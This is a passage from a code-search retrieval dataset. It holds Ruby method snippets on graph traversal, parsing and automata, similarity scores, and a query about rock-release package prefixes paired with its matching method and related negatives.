"def step!(next_state)\n @state = case @state\n when :a\n next_state == :b ? :b : :a\n when :b\n [:a, :c].include?(next_state) ? next_state : :b\n when :c\n :d\n else\n :a\n end\n end",
"def lh(t, s, c)\n\n end",
"def traverse_df(aStartVertex, &_visitAction)\n visited = Set.new\n stack = []\n visitee = aStartVertex\n curr_edge = nil\n\n begin\n # print_vertex( 'Traversing', visitee)\n\n first_time = !visited.include?(visitee)\n if first_time\n yield(visitee)\n visited << visitee\n end\n\n case visitee\n when Rley::GFG::StartVertex\n if first_time\n stack.push(Branching.new(visitee, curr_edge))\n curr_edge = stack.last.next_edge\n elsif curr_edge.nil?\n # Error probably caused by missing terminal symbol object\n msg = \"Undefined grammar symbol #{visitee.label.sub(/^\\./, '')}\"\n raise StandardError, msg\n else\n # Skip both start and end vertices\n # Retrieve the corresponding return edge\n curr_edge = get_matching_return(curr_edge)\n end\n\n when Rley::GFG::EndVertex\n if stack.last.done?\n popped = stack.pop\n break if stack.empty?\n\n # puts \"Popped!\"\n return_key = popped.in_edge.key.sub(/^CALL/, 'RET')\n curr_edge = visitee.edges.find { |e| e.key == return_key }\n else\n curr_edge = stack.last.next_edge\n end\n\n else\n # All other vertex types have only one successor\n curr_edge = visitee.edges[0]\n end\n visitee = curr_edge.successor unless curr_edge.nil?\n end until stack.empty?\n # Now process the end vertex matching the initial start vertex\n last_one = end_vertex_for[aStartVertex.non_terminal]\n yield(last_one) unless visited.include?(last_one)\n end",
"def from_left; end",
"def from_left; end",
"def solution(s, p, q)\n result = []\n\n (0..p.size-1).each do |idx|\n buff = s[p[idx]..q[idx]]\n if buff.index('A')\n result << 1\n elsif buff.index('C')\n result << 2\n elsif buff.index('G')\n result << 3\n else\n result << 4\n end\n end\n\n return result\nend",
"def villian; end",
"def set_next_veg(vgg)\n\t# Check if the next vegetable to eat is valid\n\t#check_veg(vgg)\n\t\n\t$cur_veg = vgg\nend",
"def edge(v, w)\n (@from_store[v] || []).find{ |e| e.to == w }\n end",
"def traverse; end",
"def bidirectional_djikstra\n\nend",
"def edgesymbol\n directed ? '->' : '--'\n end",
"def relational\r\n node = add()\r\n\r\n loop do\r\n if consume(\"<\")\r\n node = new_binary(ND_LT, node, add())\r\n elsif consume(\"<=\")\r\n node = new_binary(ND_LE, node, add())\r\n elsif consume(\">\")\r\n node = new_binary(ND_LT, add(), node)\r\n elsif consume(\">=\")\r\n node = new_binary(ND_LE ,add(), node)\r\n else\r\n return node\r\n end\r\n end\r\nend",
"def each_relation_edge(rg)\n rg.nodes.each { |node|\n [:src,:dst].each { |rg_level|\n next unless node.get_block(rg_level)\n node.successors(rg_level).each { |node2|\n if node2.type == :exit || node2.get_block(rg_level)\n yield IPETEdge.new(node,node2,pml_level(rg_level))\n end\n }\n }\n }\n end",
"def gratr_comparability_explore(edge, k, classification, space='')\r\n ret = gratr_comparability_explore_inner(edge, k, classification, :forward, space)\r\n gratr_comparability_explore_inner(edge.reverse, k, classification, :backward, space) && ret\r\n end",
"def targets v\n vset = Set.new\n each_edge {|e| vset |= get_vertices(e[2]) if e[1].keyvalue_sub(v) }\n return vset\n end",
"def other_vertex(vertex1)\n end",
"def other_vertex(vertex1)\n end",
"def plexus_comparability_explore(edge, k, classification, space='')\n ret = plexus_comparability_explore_inner(edge, k, classification, :forward, space)\n plexus_comparability_explore_inner(edge.reverse, k, classification, :backward, space) && ret\n end",
"def has_edge?(u, v)\n @forward_edges_with_info[u]&.key?(v)\n end",
"def activeG(g, gi, gv)\n state(ACTIVATEDG, g, gi, gv) and\n not f(g, gi, gv) and\n not satisfiedG(g, gi, gv) and\n not terminalG(g, gi, gv) and\n not state(SUSPENDEDG, g, gi, gv)\nend",
"def vogal(str)\n vogals = [\"a\", \"e\", \"i\", \"o\", \"u\"]\n cons = [\"b\", \"c\", \"d\", \"f\", \"g\", \"h\", \"j\", \"k\", \"l\", \"m\", \"n\", \"p\", \"q\", \"r\", \"s\", \"t\", \"v\", \"w\", \"x\", \"y\", \"z\"]\n# splitting the string given into arrays \n str = str.chars\n str_new = str.map do |char|\n#looping the string into the next letter\n if vogals.include?(char)\n vogals.rotate(1)[vogals.index(char)]\n else cons.include?(char)\n cons.rotate(1)[cons.index(char)]\n end\n end\n#joining the strings back\n str_new.join\nend",
"def daggers\n Regexp.new s_to_h(<<-S)\n B1 96 B1 D3 ED AE 5F 92 1B 66 03 01 .. FF FF FF\n FF .. .. .. .. 4A 19 01 0B 03 00 00 00 08 00 00\n 00 14 00 00 00 00 00 00 00 07 00 00 00 00 00 00\n 00 02 00 00 00 02 00 00 00 99 32 C5 C4 CC 57 6D\n 43 90 6B 03 01 FF FF FF FF 99 32 C5 C4 CC 57 6D\n 43 27 9E 00 01 FF FF FF FF 01 00 00 00 99 32 C5\n C4 CC 57 6D 43 27 9E 00 01 FF FF FF FF 13 00 00\n 00 00 00 00 00 00 00 00 00 05 00 00 00 00 00 00\n 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00\n 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00\n 00\n S\nend",
"def g(&b)\n c = self\n return lambda { \n break false if !c.probe\n b.call(c.rcv)\n break true \n }\n end",
"def edges\n h = hedges\n v = vedges\n [ h[0], v[1], h[1], v[0] ]\n end",
"def add_edge(u, v)\n raise NotImplementedError\n end",
"def g(x)\n -> (y) { f(x, y) }\nend",
"def graphviz(oGraph, c0, c1, c2, c3, c4)\n return if @src_id.nil? || @dst_id.nil?\n return if @count > 1 # TODO: eliminate dupulicate trans\n\n guard = @block.condition_success unless @block.nil?\n guard = \"unknown\" if guard.nil?\n\n if @title.nil?\n title = ''\n else\n title = \"#{@title}\"\n end\n @label = @type + '(' + title + ')\\n' + guard + '\\n' + @block.id\n\n if (@src_id =~ /^V_/) && (@dst_id =~ /^V_/)\n # V to V form\n src_id = @src_id + '_inbound'\n dst_id = @dst_id + '_inbound'\n\n elsif (@src_id =~ /^V_/) && (@dst_id =~ /^C_/)\n src_id = @src_id + '_inbound'\n dst_id = @dst_id\n\n c2.add_node(dst_id) if $graphviz_with_rank\n elsif (@src_id =~ /^C_/) && (@dst_id =~ /^V_/)\n src_id = @src_id\n dst_id = @dst_id + '_outbound'\n c2.add_node(src_id) if $graphviz_with_rank\n c4.add_node(dst_id) if $graphviz_with_rank\n elsif (@src_id =~ /^C_/) && (@dst_id =~ /^C_/)\n # redirect\n src_id = @src_id\n dst_id = @dst_id\n c2.add_node(src_id) if $graphviz_with_rank\n c3.add_node(dst_id) if $graphviz_with_rank\n else\n src_id = @src_id\n dst_id = @dst_id\n end\n\n # draw\n e = oGraph.add_edge(src_id, dst_id, label: @label)\n end",
"def m(a, b=:default, *c, d, e:, f:1, **g, &h)\n [a, b, c, d, e, f, g, h.call]\nend",
"def union! newFA\n end",
"def dependency(start, vertex, nested = T.unsafe(nil)); end",
"def component_of(v)\n @component[v]\n end",
"def component_of(v)\n @component[v]\n end",
"def classify_edge(x,y)\n if y.parent == x\n return :tree\n elsif y.discovered? and !y.processed?\n return :back\n elsif y.processed? and y.pre < x.pre\n return :cross\n elsif y.processed? and x.pre < y.pre\n return :forward\n end\nend",
"def bridge\n visited = {}\n disc = [Float::INFINITY] * @V\n low = [Float::INFINITY] * @V\n parent = [-1] * @V\n (0...@V).each{|u|\n bridgeUtil(u, visited, parent, low, disc)\n }\n @answer\n\n end",
"def translate( *args ) \n ## From Martin Rinehart 'Edges to Rubies' chapter 15\n ## May be called with a transformation and a vector, \n ## or with a transformation and r, g, b values.\n\n trans = args[0]\n if args.length == 2\n vec = args[1]\n r = vec[0]; g = vec[1]; b = vec[2] \n else\n r = args[1]; g = args[2]; b = args[3] \n end\n arr = trans.to_a()\n arr[12] += r; arr[13] += g; arr[14] += b \n return Geom::Transformation.new( arr )\n \n\tend",
"def union! newFA\n \n ustart = new_state\n uend = new_state\n \n add_transition(ustart, @start, \"\")\n add_transition(ustart, newFA.start, \"\")\n set_start(ustart)\n\n @transition.merge!(newFA.transition)\n @state.merge!(newFA.state)\n\n @final.keys.each { |key| add_transition(key, uend, \"\")}\n newFA.final.keys.each { |key| add_transition(key, uend, \"\")}\n\n \n @final.keys.each { |key| set_final(key, false)}\n set_final(uend, true)\n \n newFA.alphabet.each{|letter|\n if !@alphabet.include?(letter)\n @alphabet.push(letter)\n end\n } \n\n\n end",
"def solve(w, g, v)\n\n\tif $words[g] == -1\n\t\treturn v\n\telsif $words[g] == 1\n\t\treturn v + 1\n\tend\n\t#else $words[g] == 0\n\n\ttkn = next_token(w)\t\n\tfor char in tkn.chars\n\t\tv = solve(String.new(w), g + char, v)\n\tend\n\n\treturn v\nend",
"def explore(vertex)\n #binding.pry if vertexes.size == 4\n vertex = self[vertex]\n visited = Set.new\n visit_order = []\n tree = {}\n stack = []\n if vertex.is_nothing?\n return Nothing.new\n else\n vertex = vertex.from_just\n end\n # we will build a depth first search tree with backedges\n # A backedge will occur if a tree is discovered with an edge that is on a higher level in the tree\n stack.push vertex\n visit_order.push vertex.key\n visited.add vertex.key\n tree[vertex.key] = {:children => []}\n until stack.empty?\n candidate = stack.pop\n candidate.neighbours.each do |dest| # iterate through the neighbours of the vertex\n if !visited.member? dest.key # if the destination has not been visited\n visited.add dest.key\n visit_order.push dest.key # add destination to visitation path\n # Set the destinations parent to the candidate\n tree[dest.key] = {:parent => candidate.key, :children => []}\n # Add the destination key to the list of children of the canditate\n tree[candidate.key][:children].push dest.key\n #add the candidate and destination to the top of the stack so that we can return to them later in the algorithm\n stack.push candidate \n stack.push dest\n break # leave the loop, this only runs once\n end\n end\n end\n return Just.new({ tree: tree, visit_order: visit_order })\n end",
"def bases_g\n base_composition[:g]\n end",
"def pair; end",
"def each_adjacent(v, &block) # :yields: v\n raise NotImplementedError\n end",
"def hash\n\t\t[@a, @b, self.class::D].hash\n\tend",
"def each_vertex(&block) # :yields: v\n raise NotImplementedError\n end",
"def algorithm=(_); end",
"def algorithm=(_); end"
] | [
"0.518043",
"0.5179151",
"0.51606786",
"0.5020858",
"0.5017522",
"0.49492475",
"0.49427435",
"0.49024993",
"0.48651722",
"0.48567945",
"0.4855347",
"0.48414737",
"0.48189622",
"0.48189622",
"0.47811005",
"0.47811005",
"0.47726956",
"0.47606915",
"0.47451782",
"0.4734499",
"0.47137165",
"0.46974853",
"0.4665371",
"0.4660371",
"0.46531543",
"0.46315628",
"0.46196422",
"0.46079165",
"0.46052146",
"0.45989415",
"0.45989415",
"0.45989415",
"0.45989415",
"0.45989415",
"0.45989415",
"0.45756364",
"0.45754945",
"0.4574938",
"0.45630157",
"0.45552254",
"0.4551526",
"0.4551526",
"0.45509306",
"0.45476002",
"0.45303914",
"0.4528851",
"0.45129436",
"0.45100787",
"0.45068127",
"0.4505969",
"0.4503712",
"0.44905683",
"0.44857267",
"0.44654316",
"0.44650963",
"0.4463152",
"0.4461733",
"0.44547957",
"0.4450527",
"0.4450527",
"0.44457546",
"0.4431492",
"0.4431035",
"0.442258",
"0.44213396",
"0.4408695",
"0.44043672",
"0.4398739",
"0.4395812",
"0.43911448",
"0.43737373",
"0.43672022",
"0.43672022",
"0.43649316",
"0.43644708",
"0.4363736",
"0.43628076",
"0.4359646",
"0.43587667",
"0.4347963",
"0.43410328",
"0.4318507",
"0.43037862",
"0.43023074",
"0.4301096",
"0.42999458",
"0.42962846",
"0.42962846",
"0.4295298",
"0.42916772",
"0.4289982",
"0.4285672",
"0.4282316",
"0.42690703",
"0.42635047",
"0.4260221",
"0.42562276",
"0.4254982",
"0.42509422",
"0.42398143",
"0.42398143"
] | 0.0 | -1 |
Get the current rockreleasebased prefix for rock packages | def rock_release_prefix(release_name = nil)
release_name ||= rock_release_name
if release_name
pkg_prefix_base + "-#{release_name}-"
else
pkg_prefix_base + "-"
end
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def rock_ruby_release_prefix(release_name = nil)\n rock_release_prefix(release_name) + \"ruby-\"\n end",
"def base_prefix\n Starter::Config.read[:prefix]\n end",
"def prefix\n regexify(bothify(fetch('aircraft.prefix')))\n end",
"def prefixed_label(package)\n label = ( package =~ /^#{$prefix}(.*)$/ ) && $1 || package\n label = '.' if label.empty?\n label\nend",
"def exec_prefix() return @prefix end",
"def prefix\n if brewed?\n # Homebrew since a long while only supports frameworked python\n HOMEBREW_PREFIX/\"opt/#{name}/Frameworks/Python.framework/Versions/#{version.major}.#{version.minor}\"\n elsif from_osx?\n # Python on OS X has been stripped off its includes (unless you install the CLT), therefore we use the MacOS.sdk.\n Pathname.new(\"#{MacOS.sdk_path}/System/Library/Frameworks/Python.framework/Versions/#{version.major}.#{version.minor}\")\n else\n # What Python knows about itself\n Pathname.new(`#{binary} -c 'import sys;print(sys.prefix)'`.strip)\n end\n end",
"def prefix\n 'oai_dc' \n end",
"def prefix_for(ns_uri)\n if namespaces_by_uri().has_key?(ns_uri)\n namespaces_by_uri()[ns_uri].prefix || \"\" # namespace.prefix returns nil if there is no prefix defined (default prefix)\n end\n end",
"def version_tag_prefix\n if root_path == repo.root_path\n 'v'\n else\n (repo_rel_path / 'v').to_s\n end\n end",
"def get_pname(resource)\n case resource\n when RDF::Node\n return options[:unique_bnodes] ? resource.to_unique_base : resource.to_base\n when RDF::URI\n uri = resource.to_s\n else\n return nil\n end\n\n #log_debug {\"get_pname(#{resource}), std?}\"}\n pname = case\n when @uri_to_pname.key?(uri)\n return @uri_to_pname[uri]\n when u = @uri_to_prefix.keys.detect {|u| uri.index(u.to_s) == 0}\n # Use a defined prefix\n prefix = @uri_to_prefix[u]\n unless u.to_s.empty?\n prefix(prefix, u) unless u.to_s.empty?\n #log_debug(\"get_pname\") {\"add prefix #{prefix.inspect} => #{u}\"}\n uri.sub(u.to_s, \"#{prefix}:\")\n end\n when @options[:standard_prefixes] && vocab = RDF::Vocabulary.each.to_a.detect {|v| uri.index(v.to_uri.to_s) == 0}\n prefix = vocab.__name__.to_s.split('::').last.downcase\n @uri_to_prefix[vocab.to_uri.to_s] = prefix\n prefix(prefix, vocab.to_uri) # Define for output\n #log_debug {\"get_pname: add standard prefix #{prefix.inspect} => #{vocab.to_uri}\"}\n uri.sub(vocab.to_uri.to_s, \"#{prefix}:\")\n else\n nil\n end\n\n # Make sure pname is a valid pname\n if pname\n md = PNAME_LN.match(pname) || PNAME_NS.match(pname)\n pname = nil unless md.to_s.length == pname.length\n end\n\n @uri_to_pname[uri] = pname\n end",
"def base_prefix\n HaridsyncHelpers.ensure_uppercase_dn_component(group['ou'] || DEFAULT_PREFIX)\n end",
"def prefix\n fetch('university.prefix')\n end",
"def account_prefix\n current_account.account_prefix\n end",
"def prefix\n nil\n end",
"def debian_name(pkg)\n if pkg.kind_of?(Autoproj::RubyPackage)\n debian_ruby_name(pkg.name)\n else\n \"rock-\" + canonize(pkg.name)\n end\n end",
"def prefix\n self.class.prefix\n end",
"def redis_prefix\n @redis_prefix ||= name.underscore\n end",
"def prefix\n raise NotImplementedError\n end",
"def var_prefix\n # ugh, i was generating meta/qb.yml files that set 'var_prefix' to\n # `null`, but it would be nice to\n # \n meta_or 'var_prefix', namespaceless\n end",
"def package_name\n @version ? \"#{@name}-#{@version}\" : @name\n end",
"def prefix(browser, version = nil)\n assert_valid_browser browser\n assert_valid_version browser, version if version\n data = browser_data(browser)\n p = if data[\"prefix_exceptions\"] && data[\"prefix_exceptions\"][version]\n data[\"prefix_exceptions\"][version]\n else\n data[\"prefix\"]\n end\n \"-#{p}\"\n end",
"def package_name\n name = package_drop_last(slug_parts)\n name.empty? ? '_root_' : name\n end",
"def global_prefix\n self.class.global_prefix\n end",
"def prefix\n @data['prefix']\n end",
"def prefix\n ''\n end",
"def prefix\n @obj['prefix']\n end",
"def prefix(num)\n namespace + '_prefix_' + num.to_s\n end",
"def rings_project_name\n \"#{root_project_name}#{RINGS_PREFIX}\"\n end",
"def generateBuildNamePrefix()\n testflight_version_number = get_version_number(\n xcodeproj: \"CICD-DemoApp.xcodeproj\"\n )\n testflight_build_number = get_build_number(\n xcodeproj: \"CICD-DemoApp.xcodeproj\"\n )\n return \"CICD_\" + testflight_version_number.to_s + \"-\" + testflight_build_number.to_s\nend",
"def prefix; end",
"def prefix; end",
"def prefix; end",
"def prefix; end",
"def prefix; end",
"def prefix; end",
"def prefix; end",
"def prefix; end",
"def prefix; end",
"def prefix; end",
"def sdk_prefix\n @sdk_prefix ||= begin\n if !CLT.provides_sdk?\n \"\"\n else\n \"#{CLT::PKG_PATH}/SDKs\"\n end\n end\n end",
"def prefixed(p)\n condition { env['enron.api.prefix'] == p }\n end",
"def get_namespace(node, prefix); end",
"def prefix_dir_of(selection)\n if workspace_dir?(selection)\n ws.prefix_dir\n elsif find_package_set(selection)\n raise NoSuchDir, \"#{selection} is a package set, and package sets do not have prefixes\"\n else\n resolve_package(selection).prefix\n end\n end",
"def powershell_prefix\n [\n Mixlib::Install::Generator::PowerShell.get_script(\"helpers.ps1\"),\n \"$platform_architecture = Get-PlatformArchitecture\",\n \"$platform_version = Get-PlatformVersion\",\n ].join(\"\\n\")\n end",
"def package_name\n @package_name ||=\n Pathname(\"#{cartage.final_name}.tar#{cartage.tar_compression_extension}\")\n end",
"def prefix\n fetch('superhero.prefix')\n end",
"def directory_name\n \n directory_name = ''\n if self.pcb_revision != ''\n directory_name = 'pcb' \n directory_name += self.pcb_prefix + '_' \n directory_name += self.pcb_number + '_'\n directory_name += self.pcb_dash_number + '_'\n directory_name += self.pcb_revision\n end\n \n return directory_name\n \n end",
"def prefix\n \"#{name}::\"\n end",
"def resource_id(prefix)\n if default_config?\n [prefix, project, node_type, node_name]\n else\n [prefix, project, configuration, node_type, node_name]\n end.compact.join(\"_\").tr(\"-\", '_').tr(\"/\", \"_\")\n end",
"def resource_id(prefix)\n if default_config?\n [prefix, project, node_type, node_name]\n else\n [prefix, project, configuration, node_type, node_name]\n end.compact.join(\"_\").tr(\"-\", '_').tr(\"/\", \"_\")\n end",
"def prefix\n\t\treturn nil if self.coupon_prefix.blank?\n\t\tself.coupon_prefix[1..-1]\n\tend",
"def prefix(new_prefix = nil)\n return @prefix if new_prefix.nil?\n @prefix = new_prefix\n end",
"def list_prefix\n @equip_slot_info.list_prefix\n end",
"def get_radiant_player_app_name()\n app_name = \"Radiant Player\"\n return app_name\nend",
"def prefix\n fetch_sample(PREFIXES)\n end",
"def prefix(path=nil)\n return ''\n end",
"def prefix_tag(tag)\n tag = Origen::VersionString.new(tag)\n if tag.semantic?\n tag.prefixed\n else\n tag\n end\n end",
"def prefix(value)\n merge(gadrprefix: value.to_s)\n end",
"def fully_qualified_wire_name\n return java_package\n end",
"def name_prefix\n unless @name_prefix\n @name_prefix = collect_first(&:name_prefix)\n end\n return @name_prefix\n end",
"def vendored_package_name(package)\n\tFile.join($package_name, 'vendor/src', package)\nend",
"def prefix\n (platform_family?('windows') ? 'C:/Chef/' : '/etc/chef/')\nend",
"def package_name(project)\n \"#{project.name}-#{project.version}-#{project.release}.#{@architecture}.pkg.gz\"\n end",
"def str_prefix\n\t\t\t\t\"\"\n\t\t\tend",
"def get_pkg_name(candidate_tag=nil, distro=nil)\n prod_name = self.task.prod\n\n # FIXME: stop that hardcoding... one day!\n pkg_name = self.name\n\n distro = self.task.distros[0] if distro.nil?\n\n is_scl_package = MeadSchedulerService.is_scl_package?(prod_name, self.name)\n # different naming convention for different products\n if prod_name == \"eap6\" && distro == 'el7' && is_scl_package\n pkg_name = \"#{prod_name}-\" + pkg_name.sub(/-#{prod_name}$/, '')\n\n # Only enable scl thing for RHEL distros, aka when distro = el_\n elsif is_scl_package && distro.match(/^el/)\n pkg_name = \"#{prod_name}-\" + pkg_name.sub(/-#{prod_name}$/, '')\n end\n pkg_name\n end",
"def platform_shortname\n if rhel?\n if \"rocky\" == Ohai[\"platform\"]\n \"rocky\"\n else\n \"el\"\n end\n elsif suse?\n \"sles\"\n else\n Ohai[\"platform\"]\n end\n end",
"def platform_version_for_package\n if platform == 'rhel'\n platform_version[/([\\d]+)\\..+/, 1]\n else\n platform_version\n end\n end",
"def prefix(tracker_channel)\n tracker_name = CORNERPIN_NAMING[@counter]\n [tracker_name, tracker_channel].join(\"/\")\n end",
"def debian_meta_name(name, with_rock_release_prefix = true)\n if with_rock_release_prefix\n rock_release_prefix + \"meta-\" + Deb.canonize(name)\n else\n pkg_prefix_base + \"meta-\" + Deb.canonize(name)\n end\n end",
"def prefix(value)\n merge(leprefix: value.to_s)\n end",
"def inherited_prefix\n\t\t\tprefix\n\t\tend",
"def debian_ruby_name(name, with_rock_release_prefix = true, release_name = nil)\n if with_rock_release_prefix\n rock_ruby_release_prefix(release_name) + Deb.canonize(name)\n else\n \"ruby-\" + Deb.canonize(name)\n end\n end",
"def translation_prefix(context = :any)\n prefix = claim_public? ? 'UNAUTHENTICATED' : 'AUTHENTICATED'\n\n # If we only have 1 buyer, then the key used should be for a single buyer only.\n return \"#{prefix}_SINGLE\" if @number_of_buyers == 1 && context == :party_title\n\n prefix\n end",
"def name_prefix=(_arg0); end",
"def prefix pref_name\n @context['prefix'] = pref_name\n end",
"def name_prefix; end",
"def jobid_prefix\n @jobid_prefix\n end",
"def full_name\n if platform == Gem::Platform::RUBY or platform.nil?\n \"#{name}-#{version}\".dup.tap(&Gem::UNTAINT)\n else\n \"#{name}-#{version}-#{platform}\".dup.tap(&Gem::UNTAINT)\n end\n end",
"def package_name(buildno=nil)\n if buildno\n buildno = Time.now.strftime(\"%H*60+%M\")\n versnum = \"#{version}.#{buildno}\"\n else\n versnum = version\n end\n\n if platform\n \"#{name}-#{versnum}-#{platform}\"\n else\n \"#{name}-#{versnum}\"\n end\n end",
"def version_prefix\n '/v2'\n end",
"def full_name\n if platform == Gem::Platform::RUBY or platform.nil? then\n \"#{name}-#{version}\".untaint\n else\n \"#{name}-#{version}-#{platform}\".untaint\n end\n end",
"def install_root\n Pathname.new(ENV[\"PREFIX\"] || \"/var/www/ood/apps/sys\")\n end",
"def prefix_name\n \"CAGNUT_#{Time.now.strftime('%Y%m%d%H%M%S')}\"\n end",
"def drop_prefix(repo)\n repo.split('-')[1].to_s.capitalize\nend",
"def kmer_prefix(kmer)\n prefix = kmer.slice(0, kmer.length-1)\n return prefix\n end",
"def var; HOMEBREW_PREFIX+'var' end",
"def var; HOMEBREW_PREFIX+'var' end",
"def package_name\n [self.config.organization, self.config.project_name].compact.collect(&:underscore).join('-')\n end",
"def native_dependency_name(name, selected_platform = nil)\n if !selected_platform\n selected_platform = @packager.target_platform\n end\n\n # Identify this rock release and its ancestors\n this_rock_release = TargetPlatform.new(@packager.rock_release_name, selected_platform.architecture)\n\n if name.is_a? String\n # Check for 'plain' name, the 'unprefixed' name and for the 'release' name\n if this_rock_release.ancestorContains(name) ||\n selected_platform.contains(name)\n # direct name match always is an os dependency\n # it can never be in a rock release\n return [name, true]\n end\n\n # try debian naming scheme for ruby\n if this_rock_release.ancestorContains(\"ruby-#{Deb.canonize(name)}\") ||\n selected_platform.contains(\"ruby-#{Deb.canonize(name)}\")\n return [\"ruby-#{Deb.canonize(name)}\", true]\n end\n\n # otherwise, ask for the ancestor that contains a rock ruby\n # package\n ancestor_release_name = this_rock_release.releasedInAncestor(\n @packager.debian_ruby_name(name, true, this_rock_release.distribution_release_name)\n )\n if !ancestor_release_name.empty?\n return [@packager.debian_ruby_name(name, true, ancestor_release_name), false]\n end\n\n # Return the 'release' name, since no other source provides this package\n [@packager.debian_ruby_name(name, true), false]\n else\n # ask for the ancestor that contains a rock ruby\n # package\n ancestor_release = this_rock_release.releasedInAncestor(\n @packager.debian_name(name, true, this_rock_release.distribution_release_name)\n )\n if !ancestor_release.empty?\n return [@packager.debian_name(name, true, ancestor_release_name), false]\n end\n\n # Return the 'release' name, since no other source provides this package\n [@packager.debian_name(name, true), false]\n end\n end",
"def use_prefix\n prefix, @prefix = @prefix, nil\n @res << prefix if prefix\n\n prefix\n end",
"def prefix(*args)\n [@options[:env], @options[:prefix], *args].compact.join('.')\n end",
"def prefix(path)\n path ? \"#{path.underscore}__\" : ''\n end",
"def package_name\n # TODO: verify renamed packages\n resource['title']\n end",
"def full_name\n if @prefix != \"\"\n File.join(@prefix, @name)\n else\n @name\n end\n end",
"def prefix_key\n if @struct.prefix_key.size > 0\n @struct.prefix_key[0..-1 - options[:prefix_delimiter].size]\n else\n \"\"\n end\n end",
"def fmri_package_name\n version = project.build_version.split(/[^\\d]/)[0..2].join(\".\")\n platform = Ohai[\"platform_version\"]\n \"#{safe_base_package_name}@#{version},#{platform}-#{project.build_iteration}\"\n end",
"def package_name\n ver = if new_resource.version == 'latest'\n package_metadata[:version]\n else\n new_resource.version\n end\n \"Chef Development Kit v#{ver}\"\n end",
"def generateBuildNamePrefix_Debug()\n prefix = generateBuildNamePrefix\n return prefix + \"-debug\"\nend",
"def version_number\n self.name =~ /RHEL-([0-9]+)/\n return $1.to_i\n end",
"def relative_working_dir\n invoke(:rev_parse, '--show-prefix')\n end"
] | [
"0.72332764",
"0.67280084",
"0.65037626",
"0.63198924",
"0.6315063",
"0.61651635",
"0.6145332",
"0.6092354",
"0.60850835",
"0.6037899",
"0.6021138",
"0.5943009",
"0.5934455",
"0.5924296",
"0.5882006",
"0.585637",
"0.58560544",
"0.58445877",
"0.583058",
"0.5828399",
"0.5825916",
"0.5819291",
"0.581119",
"0.5750354",
"0.5745421",
"0.5742132",
"0.5718122",
"0.57166576",
"0.5708547",
"0.5698306",
"0.5698306",
"0.5698306",
"0.5698306",
"0.5698306",
"0.5698306",
"0.5698306",
"0.5698306",
"0.5698306",
"0.5698306",
"0.5691878",
"0.5680447",
"0.5666108",
"0.56603086",
"0.565329",
"0.5651862",
"0.56483865",
"0.56423175",
"0.56417435",
"0.564134",
"0.564134",
"0.56381166",
"0.56295687",
"0.55995667",
"0.5587268",
"0.5576323",
"0.5569746",
"0.5563265",
"0.5555226",
"0.5519479",
"0.5514015",
"0.55066514",
"0.5494707",
"0.5493073",
"0.5488682",
"0.5481516",
"0.5470986",
"0.5463745",
"0.54601055",
"0.5459782",
"0.5457132",
"0.5449928",
"0.5448203",
"0.54442966",
"0.5443466",
"0.5438609",
"0.5434131",
"0.54334885",
"0.54334563",
"0.54207927",
"0.5416969",
"0.54143983",
"0.5410594",
"0.5405705",
"0.5398837",
"0.53945285",
"0.5391967",
"0.5391967",
"0.53884286",
"0.53872144",
"0.53739697",
"0.53697854",
"0.5367493",
"0.53360575",
"0.53359",
"0.53356767",
"0.5329446",
"0.5319485",
"0.5318414",
"0.5310452",
"0.53099346"
] | 0.7785496 | 0 |
Get the current rockreleasebased prefix for rock(ruby) packages | def rock_ruby_release_prefix(release_name = nil)
rock_release_prefix(release_name) + "ruby-"
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def rock_release_prefix(release_name = nil)\n release_name ||= rock_release_name\n if release_name\n pkg_prefix_base + \"-#{release_name}-\"\n else\n pkg_prefix_base + \"-\"\n end\n end",
"def base_prefix\n Starter::Config.read[:prefix]\n end",
"def prefix\n if brewed?\n # Homebrew since a long while only supports frameworked python\n HOMEBREW_PREFIX/\"opt/#{name}/Frameworks/Python.framework/Versions/#{version.major}.#{version.minor}\"\n elsif from_osx?\n # Python on OS X has been stripped off its includes (unless you install the CLT), therefore we use the MacOS.sdk.\n Pathname.new(\"#{MacOS.sdk_path}/System/Library/Frameworks/Python.framework/Versions/#{version.major}.#{version.minor}\")\n else\n # What Python knows about itself\n Pathname.new(`#{binary} -c 'import sys;print(sys.prefix)'`.strip)\n end\n end",
"def exec_prefix() return @prefix end",
"def prefixed_label(package)\n label = ( package =~ /^#{$prefix}(.*)$/ ) && $1 || package\n label = '.' if label.empty?\n label\nend",
"def debian_name(pkg)\n if pkg.kind_of?(Autoproj::RubyPackage)\n debian_ruby_name(pkg.name)\n else\n \"rock-\" + canonize(pkg.name)\n end\n end",
"def version_tag_prefix\n if root_path == repo.root_path\n 'v'\n else\n (repo_rel_path / 'v').to_s\n end\n end",
"def prefix\n regexify(bothify(fetch('aircraft.prefix')))\n end",
"def package_name\n @version ? \"#{@name}-#{@version}\" : @name\n end",
"def powershell_prefix\n [\n Mixlib::Install::Generator::PowerShell.get_script(\"helpers.ps1\"),\n \"$platform_architecture = Get-PlatformArchitecture\",\n \"$platform_version = Get-PlatformVersion\",\n ].join(\"\\n\")\n end",
"def package_name\n @package_name ||=\n Pathname(\"#{cartage.final_name}.tar#{cartage.tar_compression_extension}\")\n end",
"def debian_ruby_name(name, with_rock_release_prefix = true, release_name = nil)\n if with_rock_release_prefix\n rock_ruby_release_prefix(release_name) + Deb.canonize(name)\n else\n \"ruby-\" + Deb.canonize(name)\n end\n end",
"def package_name\n name = package_drop_last(slug_parts)\n name.empty? ? '_root_' : name\n end",
"def sdk_prefix\n @sdk_prefix ||= begin\n if !CLT.provides_sdk?\n \"\"\n else\n \"#{CLT::PKG_PATH}/SDKs\"\n end\n end\n end",
